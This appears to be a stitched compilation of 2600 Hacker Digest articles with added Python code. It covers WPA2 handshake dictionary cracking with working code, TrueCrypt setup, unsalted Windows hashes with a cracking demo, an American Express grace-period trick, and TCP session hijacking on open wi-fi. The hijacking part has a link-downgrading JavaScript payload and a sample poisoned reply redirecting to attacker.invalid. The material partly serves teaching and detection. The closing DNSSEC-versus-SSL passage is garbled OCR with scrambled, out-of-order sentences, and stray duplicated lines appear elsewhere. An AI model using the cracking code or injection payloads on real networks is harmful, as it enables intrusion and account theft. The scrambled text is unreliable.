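def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, label, min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce))."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, PRF_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 (AES/CCMP) key MIC: first 16 bytes of HMAC-SHA1 over the EAPOL-Key frame
    with its MIC field zeroed. (WPA/TKIP uses HMAC-MD5 instead; not shown.)"""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def mic_matches(pmk: bytes, cap: dict) -> bool:
    kck = derive_ptk(pmk, cap["ap_mac"], cap["client_mac"], cap["anonce"], cap["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, cap["eapol"]), cap["mic"])


def crack(cap: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Per candidate: 4096 rounds of PBKDF2, then PRF-512, then one HMAC. PBKDF2 is the cost."""
    for word in wordlist:
        if mic_matches(derive_pmk(word, cap["ssid"]), cap):
            return word
    return None


def build_pmk_table(ssid: str, wordlist: Iterable[str]) -> Dict[bytes, str]:
    """The genpmk/coWPAtty idea: pay the PBKDF2 cost once per (SSID, word), store PMK -> word."""
    return {derive_pmk(w, ssid): w for w in wordlist}


def crack_with_table(cap: dict, table: Dict[bytes, str]) -> Optional[str]:
    """Only the cheap PRF + HMAC remain per entry; a table built for another SSID never matches."""
    for pmk, word in table.items():
        if mic_matches(pmk, cap):
            return word
    return None


def make_capture(passphrase: str, ssid: str) -> dict:
    """Constructed stand-in for the fields aircrack-ng pulls out of capturefile-01.cap.
    MACs are the AP/client from the commands above; nonces and the EAPOL body are made up."""
    ap_mac = bytes.fromhex("0018f91a1330")
    client_mac = bytes.fromhex("001250471ada")
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    # EAPOL-Key message 2 (client -> AP), MIC field already zeroed: version, type, length,
    # descriptor type, key info, key length, replay counter, SNonce, IV, RSC, ID, MIC, data.
    eapol = (b"\x01\x03\x00\x75" + b"\x02\x01\x0a\x00\x10" + b"\x00" * 8 + snonce
             + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x16" + b"\x00" * 22)
    cap = {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
           "anonce": anonce, "snonce": snonce, "eapol": eapol}
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    cap["mic"] = eapol_mic(kck, eapol)
    return cap


WORDLIST = ["123456", "linksys", "password", "dictionary", "letmein"]  # constructed wordlist
CAPTURE = make_capture("dictionary", "2600")                              # constructed capture

if __name__ == "__main__":
    assert derive_pmk("password", "IEEE").hex().startswith("f42c6fc52df0ebef")  # 802.11i test vector
    print("dictionary attack:   ", crack(CAPTURE, WORDLIST))
    print("table for '2600':    ", crack_with_table(CAPTURE, build_pmk_table("2600", WORDLIST)))
    print("table for 'linksys': ", crack_with_table(CAPTURE, build_pmk_table("linksys", WORDLIST)))
```

The SSID-bound table is the whole point of the article's caveat: a 33GB table for "linksys" is useless against an AP called "2600", so an unusual SSID forces the attacker back to the slow per-word PBKDF2 path.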

by GhostRydr

In today's society, with laptops and portable devices easily available and easily stolen, hard disk encryption is no longer optional. Almost every day, it seems we are hearing about another staggering amount of customer information that was lost and compromised due to a laptop theft that could have been prevented by the simple use of disk encryption. Keep in mind, there is a lot more personally identifiable information on your laptop than one might think. Information that is not even stored on your laptop, but is accessed through websites that require a login, is easily accessible to any common thug if you save your login information in your browser. If you use Windows and think your Windows password will save you, think again. Using a Trinity Rescue Kit CD, a Windows password can be hacked in less than five minutes. While losing your laptop sucks, having your identity stolen really sucks and can cost you even more.

Since being introduced to 2600 a few years ago by a close friend, I've become very interested in security and related matters, so you can imagine how thrilled I was when this project was handed to me. At my work, I was recently handed the project of devising a solution to encrypt the hard disks of all our portable users. I started out not knowing much about hard disk encryption, but this changed very quickly. My research took me down several different paths and, interfacing with different software vendors, eventually led me to choose PGP's Whole Disk Encryption. Their corporate products are very good, and will cost you several hundred dollars; they also offer a personal version for $120. However, for this article I'd like to focus on another piece of software called Truecrypt.

Truecrypt is a 100% free, open source disk encryption application from http://www.truecrypt.org/. It is easy to use and is capable of encrypting your entire hard disk from start to finish using several standardized encryption algorithms including AES, Serpent, and Twofish. Truecrypt will allow you to use up to three different algorithms together, essentially wrapping each block of data with three different layers of encryption. It wra
ps each block of data on your hard drive using an encryption algorithm which is virtually unbreakable. Truecrypt stores the encryption keys in RAM and decrypts the data on the fly. Data is unencrypted as it comes off the disk and then encrypted again before it ever touches the disk. The website has complete documentation on many other features, including portable USB drive encryption, but for this article I will just show you how easy it is to encrypt your hard disk. And best of all, it's free! The complete source code is available for download from http://www.truecrypt.org/downloads2.php, which means no worries of hidden back doors for Big Brother. This should be something that everyone with a laptop has installed.

I know some of you will say that hard disk encryption really kills your system's performance. Contrary to that, system performance is almost unaffected. Some users even report a slight increase in performance, due to a pipelining effect that happens to the read and write operations. Keep in mind, the more layers you use, the higher the impact on system performance. Using one layer should be sufficient for most.

To begin, download the installer from http://www.truecrypt.org/downloads.php, choose your flavor of operating system, Microsoft, Linux, or OS X, then download and install the package. The install is very simple and, once your drive is encrypted, your computer will boot as normal. The only real change you will see is a pre-boot environment that will appear after the BIOS screen, asking you to key in your password and unlock the disk before the operating system loads.

After installing, launch Truecrypt, select the "edit" menu, and then select "encrypt system partition/drive." At the first screen, you can choose a "normal" or "hidden" encrypted partition, the difference being that a hidden encrypted partition, simply put, will be indistinguishable from random data. For now let's go with "normal." Next, you can choose to either encrypt just the Windows boot partition or the entire physical disk. Choose the entire disk if you have 2 or more partitions and want to encrypt everything. Depending on your computer setup, select the option you think will work best. Next, choose whether you want to encrypt the host protected area, if you think you need it. At the next screen choose whether or not you have multiple operating systems installed and move forward. Now you should be at the Encryption Options window. This is where you can choose which algorithm(s) you want to use. AES is the default and is very secure, but depending on how sensitive the information you store on your laptop is, if you're feeling paranoid, you may want to choose a more secure method. For the Hash Algorithm, RIPEMD-160 (default) will do. Next, choose a password that you will use to unlock the disk. The software will recommend using a 20 character password, which is not necessary, but be sure to use common sense when choosing a password. At this point, move your mouse around to help randomize the encryption keys. Click next to see the encryption keys and then move on to create a rescue CD. Truecrypt will not allow you to continue without creating a rescue CD. If the Truecrypt boot loader ever gets damaged after you have encrypted your disk, it can be restored using the CD. Once you've burned the rescue CD and verified it with Truecrypt, click next. Select which level of "wipe mode" you prefer. The default "none" will be suitable for most. To test the system before it encrypts the disk, Truecrypt will reboot your system to ensure everything works correctly with the pre-boot authentication. Upon reboot, key in the password you specified during setup and boot into your OS. At the next prompt, the test will complete and the encryption process will begin. The time it takes to fully encrypt your hard disk will depend on the size of your disk and the system specs. A 40GB drive on a Pentium 4, 3GHz, was about 35 minutes. Once this is complete, your data will be secured and your entire hard disk will be encrypted.

For most people, your data is now safe from almost any attack method. With that in mind, laptop anti-theft devices are still a good idea, including cable locks, tracking software, and even laptop lockers. Remember that no single security method is 100% secure and security is best applied in layers.

Shouts to Rob for getting me hooked on 2600 and making this possible! See you back on The Rock!

Please Salt My Hash!
by Sam Bowne

The excellent book Hacking Exposed, Sixth Edition, by Stuart McClure, Joel Scambray, and George Kurtz, contains this terrifying statement: "All Windows hashes suffer from an additional weakness: no salt" (from page 184). Is it possible that Microsoft made such a stupid, irresponsible error? Sadly, they did, as I will explain and demonstrate.

Cleartext password storage

When you type in a password to log in, the operating system compares your input to a stored password, as shown in Table One. If the password is stored in a file, an attacker can steal that file to learn all the passwords–a very insecure system.

Table One: Cleartext Password Storage

    Username        Password
    -------------   ----------
    Administrator   zaphod
    Amir            opensesame
    Joe             password
    Lucretia        password

Password hashes

Hashes make stored passwords safer. A "hash" is a way to scramble data, designed so that it is easy to calculate, but very difficult to reverse. One popular hash function is MD5, which you can calculate online at this website: md5-hash-online.waraxe.us. Now the stored file contains hashes, instead of cleartext passwords, as shown in Table Two. When you log in, the operating system calculates the hash of your input and compares it to the stored hash. If an attacker steals the hashed passwords, he or she must reverse them to retrieve the original passwords.

Table Two: Hashed Password Storage

    Username        Password Hash
    -------------   --------------------------------
    Administrator   c953ef6978d4525b35620e9f70234aa9
    Amir            e6078b9b1aac915d11b9fd59791030bf
    Joe             5f4dcc3b5aa765d61d8327deb882cf99
    Lucretia        5f4dcc3b5aa765d61d8327deb882cf99

But there's a weakness in this system. Compare the hashed passwords for "Joe" and "Lucretia"–since they both have the same password of "password", the hash is the same. That's not safe! An attacker could pre-calculate the hashes of many common passwords and use that table to recover the passwords.

What is a salt?

To make hashes safer, random "salt" values are appended to the password before hashing it, as shown in Table Three. The salt is then stored with the hash value, as shown in Table Four. When you log in, the operating system appends the salt to your input, calculates the hash, and compares it to the stored salted hash. Even though "Joe" and "Lucretia" have the same password, there is no easy way to know that from the salted hashes. Attackers can't make a dictionary of password hashes now, unless they make thousands of dictionaries, one for each possible salt value. The Unix "crypt" man page says this feature has been included in Unix since versions 6 & 7 of AT&T Unix, which came out in 1975 and 1979.

Table Three: Salting and Hashing Passwords

    Username        Password     Salt   Password+Salt   Hashed Password+Salt
    -------------   ----------   ----   -------------   --------------------------------
    Administrator   zaphod       WM     zaphodWM        759e9786a86814820d19a8d4b642443a
    Amir            opensesame   45     opensesame45    c559d397235a44bf906d4f86cdd3e1a9
    Joe             password     q2     passwordq2      984e1b8949abbd846399e38d0f2cae81
    Lucretia        password     2r     password2r      55d1776bb284bbba75ddb31e3480b000

Table Four: Salted and Hashed Password Storage

    Username        Salt:Salted Password Hash
    -------------   -----------------------------------
    Administrator   WM:759e9786a86814820d19a8d4b642443a
    Amir            45:c559d397235a44bf906d4f86cdd3e1a9
    Joe             q2:984e1b8949abbd846399e38d0f2cae81
    Lucretia        2r:55d1776bb284bbba75ddb31e3480b000

How does Windows store passwords?

The statement in the "Hacking Exposed" book is correct: Windows does not salt its password hashes. To find out, I made the accounts shown above on a Windows 7 Beta machine, using fgdump (from http://swamp.foofus.net/) to gather the hashes. Then I used the free program "Cain" from oxid.it/cain.html to dump the hashes. To do that, just click on the "Cracker" tab, right-click the center of the window, and click "Add to list". Then click "Next". As you can see in Figure One, the hashed values are the same for "Joe" and "Lucretia". I tested this on Windows 7 Beta (32-bit), Windows Vista Business (32-bit), Windows XP Professional (32-bit), and Windows 2000 Professional, and the hash for "password" was identical in all cases. I also confirmed that the hash is the same for a local account on a Windows 2008 Server Datacenter 64-bit machine.

Conclusion

This is a shameful security error on Microsoft's part, and needs to be corrected. How can Microsoft continue to use a system which has been obsolete for 30 years? We, the consumers, need to demand more. I hope that this article may help to shame Microsoft into doing better work.

About the author

Sam Bowne teaches Ethical Hacking and other classes in the Computer Networking and Information Technology department at City College San Francisco. His website is http://samsclass.info/.
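As an added example (not part of Sam Bowne's article), the Python below rebuilds the storage schemes of Tables One to Four with the same MD5-of-password-plus-salt construction, and runs the two attacks the article describes against them: one precomputed table against the unsalted store, and a separate pass per account against the salted one. The user list and the two-character salts are taken from the tables; the wordlist is constructed. Real systems use much longer random salts and a deliberately slow hash, which the code notes but does not show.

```python
"""Cleartext vs hashed vs salted-and-hashed password storage, following Tables One to Four."""
import hashlib
import hmac
import secrets
import string
from typing import Dict, Iterable, Optional

# Table One, used as constructed test input, and the salts from Table Three
USERS = {"Administrator": "zaphod", "Amir": "opensesame", "Joe": "password", "Lucretia": "password"}
SALTS = {"Administrator": "WM", "Amir": "45", "Joe": "q2", "Lucretia": "2r"}


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def store_hashed(users: Dict[str, str]) -> Dict[str, str]:
    """Table Two: same password -> same digest, so one precomputed table cracks every account."""
    return {user: md5_hex(pw) for user, pw in users.items()}


def new_salt(length: int = 2) -> str:
    # Two characters to match the article's tables; real systems use 16+ random bytes.
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def store_salted(users: Dict[str, str], salts: Optional[Dict[str, str]] = None) -> Dict[str, str]:
    """Table Four: 'salt:md5(password + salt)'. The salt is not secret; it only has to differ per user."""
    out = {}
    for user, pw in users.items():
        salt = salts[user] if salts else new_salt()
        out[user] = f"{salt}:{md5_hex(pw + salt)}"
    return out


def verify_salted(stored: str, candidate: str) -> bool:
    """Login check: append the stored salt to the input, hash, compare in constant time."""
    salt, digest = stored.split(":", 1)
    return hmac.compare_digest(md5_hex(candidate + salt), digest)


def precomputed_table(wordlist: Iterable[str]) -> Dict[str, str]:
    """Built once, offline, before any hash file is stolen."""
    return {md5_hex(w): w for w in wordlist}


def attack_hashed(store: Dict[str, str], table: Dict[str, str]) -> Dict[str, str]:
    """One dictionary lookup per account, zero hashing at attack time."""
    return {user: table[digest] for user, digest in store.items() if digest in table}


def attack_salted(store: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """No shared table is possible: the whole wordlist is re-hashed under each account's salt."""
    words = list(wordlist)
    recovered = {}
    for user, stored in store.items():
        salt, digest = stored.split(":", 1)
        for w in words:
            if md5_hex(w + salt) == digest:
                recovered[user] = w
                break
    return recovered


def hash_work(n_accounts: int, wordlist_size: int, salted: bool) -> int:
    """Hash operations the attacker spends: a fixed table for unsalted, a full pass per account for salted."""
    return wordlist_size * (n_accounts if salted else 1)
```

Even with salting, MD5 is fast enough that the per-account pass is cheap; the salt removes the shared table, and only a slow, memory-hard hash (bcrypt, scrypt, Argon2) makes each pass expensive.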

How To Get Free Loans From American Express
by Bavs

Just like any red-blooded American, my wallet is bursting with credit cards from various banks that are more than happy to give me huge amounts of purchasing power in exchange for exorbitant APRs. My personal favorites are my American Express cards, as they give me tons of frequent flyer miles and come with an almost three week grace period each month to pay my bill. The following is a way to exploit this grace period.

Amazing Grace Period:

Step 1: Determine how short you are for the month

As soon as your account closes for the month at hand, check your balance online and do some quick arithmetic to determine if you'll have enough cash by the due date to pay in full. If not, take note of how short you are and mosey on over to your local mall. Don't forget your credit card.

Step 2: Buy something

Walk into a store with a good return policy and charge something that costs at least the amount of money that you are short to the same card. This step must be done with sufficient time left to allow for the return credit to hit your account before the grace period ends.

Step 3: Return it

Make sure that you have the cashier credit your card.

Step 4: Wait for the credit to post

Now here's the cool part. The purchase that you made will be included in the next billing cycle but, if you check the outstanding balance for your current bill, you will see that it has decreased by the amount of the return as Amex applies the credit to your account immediately, creating a mismatch between payment cycles!

Step 5: Pay your bill "in full"

Keep in mind, though, that this trick will not give you a free pass on the return money. You will have to repay it in full the next month, to help keep your account in good standing and avoid accruing interest charges, but you have successfully received a free loan from American Express and avoided accruing any interest fees! Keep that credit crisis rolling!

Shout-outs: Galaxy and The Coot

The Next HOPE
More than 100 DVDs are now available at the 2600 store: store.2600.com
. My personal favorites are my American Express cards. Make sure that you have the cashier credit your card.

Transmissions
by Dragorn

Lean back and remember the 1980s (if you can), or complain about old people always talking about "the good old days" if you can't (and while you're at it, get off my damn lawn with your rap music and your skateboards). Think back... a cheesy flashback ripple effect... Back to the days of big hair, ripped jeans, synthesizers, GI Joe being just a cartoon, and shared media networks. Shared media networks, the predecessors of modern switched networks, were a hacker's playground. Sharing the same network, every system on the network got the packets from every other system. Anything anyone else on your segment did was visible, and anything you did could affect all other users on the network. Too bad the good (which is to say, bad) old days are long gone, right? We'll never see their like again. Everything now is switched, encrypted, protected. I'll just take my laptop and go sulk at the coffee shop and leech a little free wi-fi...

Imagine. Free, unencrypted wi-fi. Where all the users are on the same channel. That's right, wi-fi is a time machine to the 80s. All the old tricks work, we just need to tweak them around a bit.

Most likely the best trick that most of us have forgotten all about is TCP session hijacking. Arguably, exactly this attack was shown about five years ago at DefCon in Airpwn by Toast, and then promptly forgotten as anything other than a method to make people look at goatse. Unfortunately, this is by no means limited to simply pranking.

Every TCP connection goes through a handshake stage where the client and server exchange sequence numbers and establish the connection, and packets sent from then on advance the sequence number by the number of bytes sent. The sequence number is used to ensure that all packets are delivered, that the packets are delivered in order, and that the packets came from a host which knows the proper sequence. Without this sequence number, packets which claim to be part of a connection are discarded. TCP is only "secure" (that is, secure from being spoofed by random attackers) in so much as it uses a random sequence number. On a shared physical medium, this number is by no means random or unknown...

Performing a TCP hijack is the same as it's ever been: Capture packets, extract the sequence number, and reply quicker than the foreign system. On a shared network like open wi-fi, a local attacker is closer, and therefore able to respond more quickly than a remote host which can be thousands of miles and many routers away, each hop taking more time to navigate... Sessions can be hijacked at the beginning of the connection by spoofing the remote system during the handshake process, but they can also be hijacked in the middle of a stream by beating the next legitimate packet. When a TCP session is spoofed, it is indistinguishable from traffic coming from the legitimate host. In fact... timing might reveal that the packets are coming from a closer source than a physically distant remote host, but for all practical purposes a client application will have no chance of detecting a spoof attack. Exploiting this allows matching things like HTTP requests and replacing them.

The obvious risk from this (and one many attendees of DefCon learned to their dismay) is replacement of any web content with any other arbitrary content. The HTTP security model is generally based around the idea that only javascript code which is part of a page, or which is included by a page, is allowed to alter the page. Cookies are based on domain controls so that only websites which appear to be the proper domain can access them. Browsers such as Chrome segregate individual pages into separate instances to prevent cross-contamination. All of these protections are eliminated when surfing an unencrypted website on an open network. Most modern AJAX-ified Web Two Point Whatever pages include helper javascript (and often, dozens of helper javascript) files when they load. Any one of those javascript helper files has privileges to control the content of the website. By delaying the TCP session hijack until the handshake is completed and the user has requested a file, it becomes easy to target specific files (for example, a tracking/statistics file from a popular company which rhymes with "moogle"). Once inside the DOM, it becomes trivial to rewrite the content of pages on the fly, extracting cookies, poisoning links, redirecting forms, opening a variety of possibilities. For example, replacing every https link with the unencrypted http equivalent:

    var refs = document.getElementsByTagName('a');
    for (var i = 0; i < refs.length; i++) {
        var rval = refs[i].getAttribute("href");
        if (rval == null) {
            continue;
        }
        refs[i].setAttribute("href", rval.replace(/^https:/, "http:"));
    }

Even without exploiting the browser, purely browser-level issues such as wrapping all future browsing in an iframe can still compromise sessions. When the TCP stream can no longer be trusted, no content can be considered safe.

What can happen to you? Just about anything. Having your browser fed a selection of the latest exploits is one obvious result. The chances of picking up something unpleasant from public networks are compounded when you consider the risks of the browser cache, a slower, but major, risk. The cache is controlled by the HTTP headers. The HTTP headers are, of course, returned as part of the TCP stream, which we just saw being altered for fun and profit. Files loaded in the background are just as cacheable as normal web pages. Javascript helper files can be set to cache. Once cached, a hostile file will remain until the browser cache is cleared, the cache expires, or the page using it changes to include another file. Controlling the cache of a page on an insecure network can lead to control of secure content later, as detailed by Robert Hansen at http://www.sectheory.com/rfc1918-security-issues.htm.

So, someone has fed you a poisoned javascript file. Once in your cache, a hostile file can call home each time it's loaded, acting completely normally, waiting for an opportunity later. The spiked file may do nothing for a month, until a new browser vulnerability allows a takeover of the whole system. This might be when you're at home, or at the office. Think about that one again. Even websites which normally are not considered trusted, because they don't require a login, or aren't something you care about (if, for some inexplicable reason, you don't mind someone having one of your logins somewhere), may now lurk: a "low-trust" web page remaining in your cache indefinitely until the next browser 0-day hits can include a new attack via a cached callback.

These risks are inherent in any open network, and avoiding them is very difficult. Simply clearing the cache or setting the browser to not cache may prevent retaining poisoned content, but that won't prevent local attacks from working in the first place. The only way to avoid bringing home something unexpected from the coffee shop wi-fi is pretty much the same as the precautions you should be taking already, with one notable addition: Use a VPN or SSH tunnel for all traffic. The addition? Use it for all traffic.

WRITERS WANTED

Send your article to articles@2600.com (ASCII text preferred, graphics can be attached) or mail it to us at 2600 Editorial Dept., PO Box 99, Middle Island, NY 11953-0099 USA. If you go the snail mail route, please try to include a CD copy so we don't have to retype the whole thing if we decide to use it. Articles must not have already appeared in another publication or on the Internet. Once published in 2600, you may do whatever you please with your article.
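The hijack works because the legitimate reply still arrives, just later, so a monitor on the same medium sees two segments for one flow carrying the same sequence number with different bytes. As an added example (not from this column and not Airpwn's code), the Python below builds a constructed request and two replies, one injected from the LAN two milliseconds after the request with a year-long Cache-Control header and a script payload, the other from the real server 43 milliseconds later, and flags the pair. Addresses, ports, TTLs and payloads are made up; the rule that the earlier, higher-TTL copy is the suspect is a heuristic based on the column's timing argument, not proof.

```python
"""Spotting a TCP injection on a shared medium: two segments in one flow with the same
sequence number but different payloads (or TTLs). Constructed packets only, no raw sockets."""
import socket
import struct
from typing import Dict, List, NamedTuple, Tuple


class Segment(NamedTuple):
    ts: float
    src: str
    dst: str
    sport: int
    dport: int
    seq: int
    ttl: int
    payload: bytes


def build_packet(src: str, dst: str, sport: int, dport: int, seq: int, ack: int, ttl: int, payload: bytes) -> bytes:
    """Minimal IPv4 + TCP (PSH/ACK) frame without checksums, enough for the parser below."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, 0x18, 65535, 0, 0)
    total = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, ttl, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp + payload


def parse_packet(ts: float, raw: bytes) -> Segment:
    ihl = (raw[0] & 0x0F) * 4
    total = struct.unpack("!H", raw[2:4])[0]
    ttl = raw[8]
    src, dst = socket.inet_ntoa(raw[12:16]), socket.inet_ntoa(raw[16:20])
    sport, dport, seq, _ack, offset = struct.unpack("!HHIIB", raw[ihl:ihl + 13])
    data_start = ihl + (offset >> 4) * 4
    return Segment(ts, src, dst, sport, dport, seq, ttl, raw[data_start:total])


class Alert(NamedTuple):
    flow: Tuple[str, int, str, int]
    first: Segment
    second: Segment

    @property
    def suspect(self) -> Segment:
        # Heuristic: the injected copy beats the real one and, coming from the local
        # segment, has crossed fewer routers, so its TTL is higher.
        return self.first if self.first.ttl >= self.second.ttl else self.second


def detect_injection(segments: List[Segment]) -> List[Alert]:
    """Flag a repeated sequence number whose bytes or TTL differ from the copy seen earlier.
    A genuine retransmission repeats the same bytes from the same distance and is ignored."""
    seen: Dict[Tuple[str, int, str, int], Dict[int, Segment]] = {}
    alerts: List[Alert] = []
    for seg in sorted(segments, key=lambda s: s.ts):
        if not seg.payload:
            continue
        flow = (seg.src, seg.sport, seg.dst, seg.dport)
        earlier = seen.setdefault(flow, {}).get(seg.seq)
        if earlier is None:
            seen[flow][seg.seq] = seg
        elif earlier.payload != seg.payload or earlier.ttl != seg.ttl:
            alerts.append(Alert(flow, earlier, seg))
    return alerts


# Constructed traffic: a request, an injected reply from the LAN, then the real reply.
CLIENT, SERVER = "10.0.0.5", "93.184.216.34"
REQUEST = b"GET /helper.js HTTP/1.1\r\nHost: example.com\r\n\r\n"
POISONED = (b"HTTP/1.1 200 OK\r\nContent-Type: application/javascript\r\n"
            b"Cache-Control: max-age=31536000\r\n\r\n"          # keep it in the cache for a year
            b"document.location='http://attacker.invalid/';")
LEGIT = (b"HTTP/1.1 200 OK\r\nContent-Type: application/javascript\r\n"
         b"Cache-Control: no-store\r\n\r\nvar x = 1;")


def sample_traffic() -> List[Segment]:
    ack_after_request = 1000 + len(REQUEST)
    return [
        parse_packet(0.000, build_packet(CLIENT, SERVER, 51234, 80, 1000, 5000, 64, REQUEST)),
        parse_packet(0.002, build_packet(SERVER, CLIENT, 80, 51234, 5000, ack_after_request, 64, POISONED)),
        parse_packet(0.045, build_packet(SERVER, CLIENT, 80, 51234, 5000, ack_after_request, 52, LEGIT)),
    ]


if __name__ == "__main__":
    for alert in detect_injection(sample_traffic()):
        s = alert.suspect
        print(f"injection in {alert.flow}: seq={s.seq} ttl={s.ttl} at t={s.ts:.3f}s")
```

Kismet-style monitors apply the same rule on the wireless side; the important limitation is that the detector only sees the duplicate after the client has already accepted the first copy, so it tells you the session was tampered with, not that it was saved.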

As we no longer can trust that the certificate issuers are doing their jobs correctly. You have some serious reading to do if you don’t know who that is. We must therefore analyze the process of how the public key gets signed and how the certificate is obtained to be able to score this round. you normally specify the higher authorities with trust-anchors in your resolving DNS. however. The experiment undermined the trust of SSL certificates in general. Each top level domain (such as . we can no longer trust SSL certificates in general. there is no central policy on how the authentication must
Round 1: Trust
154
.gov top level domain. Dan Kaminsky . As both technologies solve the same problem. instead trust is established by special DNS records that are published and signed by the top level domain. DNSSEC and SSL overlap. The US Federal government announced that they would sign the . So far.com
DNSSEC is a promising technology that will increase trust on the Internet. In DNSSEC. .gov to sign 2 their domains . In DNSSEC.UK) needs to have an authentication process in place to make sure that only valid requests get signed and published. TLS. both technologies provide additional security benefits that are not covered in this article. The technologies will never be mutually exclusive.
DNSSEC allows for authenticated denial of existence (very useful?). The Office of Management and Budget (OMB) issued a memorandum requiring agencies under . one can question if we need to use them both? • Can I turn SSL off if I’m using DNSSEC? • Do I really have to implement DNSSEC if I already have SSL? This article is a seven-round match up between the two technologies. DNSSEC enables you to identify sites on the Internet so that you really know that you are communicating with the correct one. How is trust implemented in each technology? Both technologies provides endpoint authentication of the server you are communicating with. For example. 2. managed to get an SSL certificate for a domain 3 that he wasn’t affiliated with .THE HACKER DIGEST . Some people think that DNSSEC will save the world and that everything will be safe after implementing DNSSEC. The technology came into the spotlight during 2008 because of two events: 1 1. is the same. the certificate issuer is supposed to check the identity of the requester before a certificate is issued. DNSSEC will face the same control and regulation challenges as SSL certificates do. a security researcher. In SSL this higher authority is the issuer of the certificate. It is very likely that DNS software will come preconfigured with trust anchors in the future. I will analyze which integrity mechanisms the technologies can provide.MIL. I think that DNSSEC is a nice addition that complements existing technologies. Recently. Not that much of a difference between the technologies there. how they are implemented. the parent domain (typically the top level domain) should check the identity of the child before the records are signed and published. Just to be clear. DNSSEC stands for Domain Name System Security Extension and adds security to domain name lookups. Both DNSSEC and SSL are designed with integrity as a goal. That is. The issuer did not authenticate the requester correctly. 
Some even think that it will stop phishing attacks. .ORG. . much like browsers come preconfigured with a list of certificate authorities to trust. works by installing a digital certificate on the web server. Both technologies have higher authorities that vouch for an identity. either. We have all seen HTTPS in action and most readers probably have a general knowledge of how it works. SSL can encrypt data to guarantee confidentiality. His little experiment exposed a weakness in the SSL certificate issuing process.SE.VOLUME 26
by John Bayne stephan@scandinode. Some think that it will prevent spam and guarantee that senders aren’t forged. Eddy Nidd. how certain we are that the site we are visiting actually is the one it claims to be. and how they differ. The end result. allowing users to connect via secure HTTPS instead of HTTP. In SSL. Those higher authorities are listed in your browser. Security is never stronger than its weakest link. In DNSSEC there is no certificate sent back to the requester. The authentication stems from the fact that there is a chain of trust that you can follow to verify the identity. that more popularly is being referred to as SSL. For one particular problem.

the challenges are even worse in DNSSEC as most top level domains use third party registration partners to do the actual authentication of the requester. even if you have access to a computer or router in its path. The visual warning is determined by how it is implemented in the browser. owned by Verisign. doing online banking. SSL has some obvious flaws when it comes to authenticating the requester of the certificate. DNSSEC only secures the DNS lookup. But 6 Not Threatening” . DNSSEC suffers from the same dilemma. How strong are the algorithms that are in use? In the beginning of 2009. Somebody with access to a computer in the path between the sender and receiver can potentially tamper with communication. one certificate out of seven is using this old and 5 deprecated MD5 security algorithm . they are still not up to the challenge. and therefore the trust in DNSSEC can be questioned. There are thousands of third party registration partners that have to authenticate the requester in a secure way. To make an analogy. Although the warnings have become better and clearer with the newer versions of browsers. The next version of Windows will only ship with a “non-validating. (If you ever feel that you would like to stop trusting a particular CA. We need to wait for full DNSSEC support from the client operating system before we can have a true end to end security. What he forgot to explain is that there might be one or more fake Certificate Authorities out there that can issue valid certificates for any server. There is no central body that oversees and audits the certificate authorities. Therefore. you can do so by going to Tools/Options/Advanced/ View certificates/Delete in Firefox) The MD5 algorithm is deprecated in DNSSEC. and there is no way of knowing that the DNS community would do a better job. The true end to end capabilities of SSL makes it a winner in this round. This round is a draw. DNSSEC is not end to end. 
Does the technology provide true end to end security? SSL provides near end to end security. There are about the same number of certificate issuers in a browser as there are top level domains. Alexander Sotirov found an issue with SSL allowing him to create a rogue Certification Authority (CA) certifi4 cate trusted by all common web browsers . The lack of end to end security makes DNSSEC vulnerable for attacks in the last hop between the resolving DNS server and the client.
Round 3: End to end
Round 2: Algorithms
Round 4: User Warnings
155
.THE HACKER DIGEST . The only way to interfere with SSL would be at the end nodes. DNSSEC is the winner in this round. Instead. In fact. The RFC recommends that IPSEC be used as a mechanism to prevent this. Tim Callan of Verisign quickly wrote an article in Securityfocus claiming that “MD5 Hack Interesting. How do we make sure that every top level domain and every registrar implements the controls correctly? We can’t. Some top level domains (yes. The Certificate Authority in question was RapidSSL. the resolving DNS server at the client side validates the records and notifies the client about the outcome. Most users don’t check to make sure that they are on a secure site when they are. for example. The warnings usually consist of a small padlock icon. or a green background in the address field. It is therefore impossible to tamper with the communication. security-aware stub resolver. The SSL community should have ditched MD5 a long time ago. you are securing the phone book lookup but not the actual call. as the traffic is secured between the browser and the web server. both technologies lack control mechanisms for how trust is implemented.VOLUME 26
be performed and there are no control mechanisms in place to control the top level domains. This certificate allows us to impersonate any website on the Internet. and not the communication. It is typically only secure between the resolving DNS server and the authoritative DNS server and not all the way up to the client. you guessed it) use SSL to secure communication when users are being authenticated. He took advantage of the weak MD5 security algorithm that is in widespread use in SSL certificates.” These types of resolvers are not true 7 end to end . SSL is implemented on top of the communication protocol it is securing. That would. On the other hand. however. How clear is the warning that the technology present to the user about invalid certificates/ resource records? SSL is often criticized for the visual warnings (or lack thereof) that are presented to the user. so implementing controls will face the same type of challenges in both technologies. An attacker could potentially tamper with the packets between the resolving DNS and the client to trick the client into thinking that the digital signature of the requested resource record is valid. be hard to implement and maintain in a real world environment. In fact. It is yet to be seen how DNSSEC will handle this.

